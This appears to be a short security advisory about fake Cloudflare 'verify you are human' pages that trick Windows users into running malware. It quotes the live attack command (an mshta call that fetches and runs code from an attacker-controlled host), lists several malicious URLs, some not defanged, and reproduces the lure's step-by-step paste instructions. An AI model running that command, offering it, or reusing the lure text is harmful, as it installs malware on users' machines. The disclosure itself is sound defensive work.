Fake “Verify you are human” Cloudflare —what to do?

If you come across a page that looks similar to Cloudflare and asks you to run code on your Windows machine, close the page and contact the webmaster. If your own website is affected by this malware, you need to take it off immediately—it will protect your visitors and it will prevent reputation damage.

How this malware works?

The fake Cloudflare page offers instructions on how to verify that you are a human but actually, you are being instructed to run malware on your computer via mshta a tool designed to run .hta files.

What to do if you are a victim?

If you fall for it, and run the code from the command prompt, it’s best to re-install the operating system.

Malicious code:

Unusual Web Traffic Detected
mshta http://bridge.tree-sock-rain.today/ # "Cloudflare Verification Code: 635H-U8N2-P9C1-1NZP"

1/61 security vendor flagged the .hta file as malicious
Kaspersky: HEUR:Trojan.Script.Generic

Antiy
Trojan[Ransom]/MP3.Spora.enc

Eset NOD32
JS/TrojanDownloader.Agent.ACCL trojan

Sitecheck (Sucuri)
Known javascript malware: malware?fake_update.8.27

Any.run
https://app.any.run/tasks/94e80210-079b-431c-9cc3-21a8515326b7

@SkylineETH

Malicious URLs:
https://dareka4te.shop/endpoint
https://bsc-dataseed.binance.org
http://bridge.tree-sock-rain.today
https://i.jolttapestry.fun/7456f63a46cc318334a70159aa3c4291

1. hxxp://bridge[.]tree-sock-rain[.]today/
Hosting Provider behind Cloudflare:
CHANGWAY-AS, HK
[email protected]

2. hxxps://i[.]jolttapestry[.]fun
Hosting Provider behind Cloudflare:
VDSINA-AS, RU
[email protected]

Malicious page content, that instructs the victims to execute bad code.

Unusual Web Traffic Detected
Our security system has identified irregular web activity originating from your IP address. Automated verification attempts have failed, and we were unable to confirm that you are a legitimate user.
To proceed with verification, please follow these steps:
1. Press  Win + R to open Run.
2. Copy and paste Ctrl + V the following command:
3. Press Enter and wait for confirmation.
This manual verification step helps us ensure that your connection is secure and not part of an automated request. If you fail to complete this step, access to certain features may be temporarily restricted.